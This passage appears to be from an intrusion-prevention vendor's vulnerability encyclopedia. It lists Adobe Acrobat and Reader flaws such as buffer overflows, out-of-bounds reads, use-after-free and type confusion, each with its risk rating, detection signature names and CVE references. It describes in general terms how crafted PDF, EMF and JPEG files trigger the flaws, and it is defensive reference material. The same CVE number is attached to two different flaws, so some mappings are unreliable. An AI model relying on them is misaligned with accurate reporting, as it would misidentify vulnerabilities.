HTTP_SS-Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
File-PDF_Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow

References:

CVE-2010-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2862

BID-42203
http://www.securityfocus.com/bid/42203

Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

Moderate

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

An use-after-free vulnerability has been reported in Adobe Acrobat and Acrobat Reader. This vulnerability is due to incorrect handling of Format event actions attached to form fields. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerability could lead to arbitrary code execution under the security context of the user.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free

References:

CVE-2020-24437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24437

Adobe-Acrobat-And-Reader-JavaScript-Field-Name-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2015

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

Improper handling of JavaScript operations causes an out of bounds read vulnerability in Adobe Acrobat and related software. A successful exploit may lead to information disclosure.

Situation:

File-PDF_Adobe-Acrobat-JavaScript-Field-Name-Out-Of-Bounds-Read

References:

CVE-2020-3744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3744

Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-844-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

There exists an out-of-bounds read vulnerability in Adobe Acrobat and Reader. A remote attacker can use this to gain sensitive information.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read

References:

CVE-2017-2946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2946

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There has been reported a vulnerability in the JPEG2000 component of Adobe Acrobat and Acrobat Reader. This vulnerability could be exploited by a remote attacker, if a target user open a maliciously crafted webpage or a maliciously crafted PDF document. Successful exploitation could result in information disclosure.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read

References:

CVE-2017-16374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16374

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953

About this vulnerability:

A vulnerability in Adobe Acrobat and Acrobat Reader

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Input Validation

Description:

An out of bounds read vulnerability has been reported in the JPEG2000 component of Adobe Acrobat and Acrobat Reader. The vulnerability is due to improper processing of embedded JPEG2000 images in PDF files. A remote attacker could exploit the vulnerability by enticing a user to open a maliciously crafted webpage or a maliciously crafted PDF document. Successful exploitation could result in information disclosure which could be used to further compromise the target system.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953

References:

CVE-2018-15953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15953

Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1073-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper processing of JPEG2000 files in PDFs causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to information to be disclosed to a remote attacker.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949

References:

CVE-2018-4949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949

Adobe-Acrobat-And-Reader-PDF-Gotoe-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

An incomplete fix for CVE-2018-4993, which improperly validates GoToE actions in a PDF document, causes a vulnerability in Adobe Acrobat. A successful exploit allows an attacker to leak NTLM hashes from the target.

Situation:

File-PDF_Adobe-Acrobat-Gotoe-Information-Disclosure

References:

CVE-2018-15979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15979

Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Input Validation

Description:

A lack of input validation for remote XML style sheet URLs causes an information disclosure vulnerability in Adobe Acrobat. A sucessful exploit may allow an attacker to gain access to NTLM hashes on the target system.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure

References:

CVE-2019-7089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7089

Adobe-Acrobat-And-Reader-Remote-Code-Execution

About this vulnerability:

A vulnerability in Adobe Acrobat and Reader

Risk:

High

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat;Adobe Reader

Type:

Input Validation

Description:

A vulnerability in Adobe Acrobat and Adobe Reader, multiple versions, which allows remote attackers to execute arbitrary code by sending a target user a maliciously crafted PDF document, due to the improper handling of the Text field value.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Remote-Code-Execution

References:

CVE-2019-7125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7125

Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable

About this vulnerability:

A vulnerability in Adobe Acrobat and Reader

Risk:

High

First detected in:

sgpkg-ips-1332-5242

Last changed:

sgpkg-ips-1332-5242

Platform:

Generic

Software:

Adobe Acrobat;Adobe Reader

Type:

Malfunction

Description:

There exists a vulberability in Adobe Acrobat and Adobe Reader, versions 10.1.1 and prior, 9.4.6 and prior, which allows remote attackers to execute arbitrary code due to a flaw in the code that handles U3D files embedded in PDF files.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable

References:

CVE-2011-2462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2462

Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

Moderate

First detected in:

sgpkg-ips-522-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Adobe Acrobat and Reader. The vulnerability is due to an error when dealing with oneOfChild property of an XFA element enclosed in a PDF file. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted document. A successful attack could result in the execution of arbitrary code in the security context of the target user. Note: This vulnerability is currently being exploited.

Situation:

File-PDF_Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution

References:

CVE-2013-0640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0640

BID-57931
http://www.securityfocus.com/bid/57931

OSVDB-90169
http://www.osvdb.org/90169

Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in both Adobe Acrobat and Reader. The vulnerability is due to a stack-based buffer overflow error within the CoolType.dll module when handling PDF files containing OpenType or TrueType fonts. Remote attackers could exploit this vulnerability by enticing target users to open a malicious PDF document. Successful exploitation would result in arbitrary code execution in the context of the logged on user.

Situation:

HTTP_SS-Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow
File-PDF_Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
File-PDF_Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow

References:

CVE-2010-2883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883

BID-43057
http://www.securityfocus.com/bid/43057

Adobe-Acrobat-Dc-Smask-Image-Xobject-Height-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Pro DC

Risk:

Moderate

First detected in:

sgpkg-ips-1389-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Integer Overflow

Description:

An image object with a negative dimension was detected in a PDF. Such objects can be used to trigger vulnerabilities that result from improper handling of invalid data.

Situation:

File-PDF_Negative-Image-Dimension

References:

CVE-2021-39843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39843

Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1086-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of EmfPlusDrawLines records in an EMF file causes a heap buffer overflow vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to run arbitrary code on the target system with the privileges of the Acrobat process.

Situation:

File-Binary_Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow

References:

CVE-2018-5067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5067

Adobe-Acrobat-File-Extension-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

A vulnerability exists in Adobe Acrobat's handling of a document's file name extension. When Acrobat opens a file with an overly long file name extension, a buffer overflow occurs. An attacker could use this vulnerability to remotely execute code on a system. In a simple attack scenario, upon opening a document file with an overly long extension, the Adobe Acrobat application will terminate. In a more complicated attack scenario, an attacker could craft a file extension with shell code embedded in it, in which case the behaviour of the target machine would depend entirely on the injected shell code.

Situation:

HTTP_SHS-Adobe-Acrobat-File-Extension-Buffer-Overflow

References:

CVE-2004-0632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0632

Adobe-Acrobat-File-Information-Disclosure

About this vulnerability:

File information disclosure vulnerability in Adobe Acrobat

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

Adobe Acrobat installs an ActiveX component that can be explicitly invoked in web pages. It is possible to create a HTML page that uses this component to retrieve information about the existence of files on the host viewing the web page.

Situation:

HTTP_Adobe-Acrobat-File-Information-Disclosure
File-Text_Adobe-Acrobat-File-Information-Disclosure

References:

CVE-2005-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0035

BID-12989
http://www.securityfocus.com/bid/12989

OSVDB-15242
http://www.osvdb.org/15242

Adobe-Acrobat-Flatedecode-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in the Adobe Acrobat and Reader applications. The vulnerability is due to the way these applications process FlateDecode filter parameters. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious PDF file. In an attack where code injection is not successful, the affected application may terminate abnormally. In an attack where code injection is successful, the behavior of the target host depends on the intended function of the injected code. The injected code is executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Adobe-Acrobat-Flatedecode-Integer-Overflow
File-PDF_Adobe-Acrobat-Flatedecode-Integer-Overflow

References:

CVE-2009-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1856

BID-35294
http://www.securityfocus.com/bid/35294

Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of BMP data in an EMF file causes a heap buffer overflow vulnerability the ImageConversion component of Adobe Acrobat. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow

References:

CVE-2018-4982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982

Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1071-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

There has been reported an out of bounds vulnerability in Adobe Acrobat. Successful exploitation might lead to information disclosure.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read

References:

CVE-2017-16407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16407

Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

There has been reported a heap-based buffer overflow vulnerability in the ImageConversion component of Adobe Acrobat. This vulnerability can be exploited, if a target user opens a crafted EMF document provided by a remote attacker. Successful exploitation could result in arbitrary code execution.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow

References:

CVE-2017-16416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16416

Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

High

First detected in:

sgpkg-ips-1136-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the ImageConversion component of Adobe Acrobat. The vulnerability is due to improper parsing of an object pointed by ObjectID of an EmfPlusDrawBeziers record. A remote attacker could exploit this vulnerability by enticing a target user into opening a crafted EMF document. Successful exploitation could result in arbitrary code execution under the security context of the user.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion

References:

CVE-2018-4949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949

Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1081-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of an EmfPlusPath Object data within an EMF file causes a heap buffer overflow in Adobe Acrobat. A successfule exploit allows arbitrary code execution under the security context of the user.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow

References:

CVE-2018-4978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978

Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1055-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of the EMR_STRETCHBLT record in an EMF file causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to information disclosure.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read

References:

CVE-2018-4886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4886

Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of EMR_STRETCHDIBITS data within an EMF file causes a buffer overflow vulnerability in Adobe Acrobat. A successful exploit allows arbitrary code to be executed with the privileges of the Acrobat process.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow

References:

CVE-2017-16397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16397

Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1038-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of EMF files causes a heap buffer overflow in Adobe Acrobat. A successful exploit can allow an attacker to run arbitrary code on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow

References:

CVE-2017-16404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16404

Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Integer Overflow

Description:

Improper parsing of EMF+ records in an EMF file causes an integer overflow vulnerability in Adobe Acrobat. A successful attack allows arbitrary code to be executed on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow

References:

CVE-2017-11308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11308

Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-991-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Integer Overflow

Description:

A vulnerability caused by improper parsing of EMF files in Adobe Systems Acrobat 2017 can cause an integer overflow.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow

References:

CVE-2017-11227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11227

Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-980-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper handling of EMF files causes an out of bounds read vulnerability in Adobe Acrobat. Successful exploitation of the vulnerability allows a remote attacker to leak information from the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read

References:

CVE-2017-11249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11249

Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1052-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper parsing of EMF+ records causes a heap-based buffer overflow in Adobe Acrobat. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow

References:

CVE-2018-4895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4895

Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Integer Overflow

Description:

Improper parsing of a EmfPlusDrawBeziers records in EMF files causes a vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to be able to disclose information on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure

References:

CVE-2018-15946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15946

Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1093-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of EMF+ records in an EMF file causes an out of Bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to execute code on the target system.

Situation:

File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read

References:

CVE-2018-5061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5061

Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-852-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

Improper handling of color profile data in JPEG files causes a heap buffer overflow, which can be exploited to gain user-level code execution ability on the target system.

Situation:

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow

References:

CVE-2017-2959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2959

Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-857-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper validation of JPEG files results in an out-of-bounds read vulnerability in Adobe Acrobat. A successful exploit can allow an attacker to extract information from the target system.

Situation:

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read

References:

CVE-2017-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2960

Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat DC (Classic)

Risk:

Moderate

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of an APP2 tag of a JPEG image causes an out-of-bounds read vulnerability in Adobe Acrobat. A successful exploit allows an attacker to gain information that is useful for further exploitation of the system.

Situation:

File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read

References:

CVE-2018-12855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12855

Adobe-Acrobat-JavaScript-GetAnnots-Memory-Corruption

About this vulnerability:

A buffer overflow vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-219-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

A memory corruption vulnerability exists in Adobe Reader and Acrobat. The vulnerability is due to insufficient input validation in the implementation of the getAnnots JavaScript method. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious PDF file. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.

Situation:

HTTP_SS-Adobe-Acrobat-GetAnnots-Memory-Corruption
File-PDF_Adobe-Acrobat-GetAnnots-Memory-Corruption

References:

BID-34736
http://www.securityfocus.com/bid/34736

Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Adobe Systems Acrobat Professional

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Adobe Acrobat and Reader. The vulnerability is due to insufficient input validation in the getIcon() method of a Collab object while processing a crafted PDF file. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files. A successful attack may lead to code execution in the context of the current user.

Situation:

HTTP_SS-Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
File-PDF_Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow

References:

CVE-2009-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927

BID-34169
http://www.securityfocus.com/bid/34169

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

There has been reported an out of bounds read vulnerability in Adobe Acrobat. Successful exploitation could lead in information disclosure.

Situation:

HTTP_SHS-Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read

References:

CVE-2019-7110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7110

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There exists an out of bounds read vulnerability in Adobe Acrobat. Opening the maliciously crafted file is required to exploit the vulnerability. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109

References:

CVE-2019-7109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7109

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1192-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Adobe Acrobat. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write

References:

CVE-2019-7111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7111

Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1070-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper handling of embedded JPEG2000 files in PDFs causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow remote code execution.

Situation:

File-PDF_Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990

References:

CVE-2018-4990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990

Adobe-Acrobat-JPXDecode-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Adobe Acrobat

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the Adobe Acrobat and Acrobat Reader products. The vulnerability is due to an error when processing the RGN marker segment of a JPXDecode encoded data stream. Remote attackers can exploit this vulnerability by enticing affected users to open a malicious PDF document in a vulnerable version of the product, allowing code execution in the context of the current user.

Situation:

HTTP_SS-Adobe-Acrobat-JPXDecode-Memory-Corruption
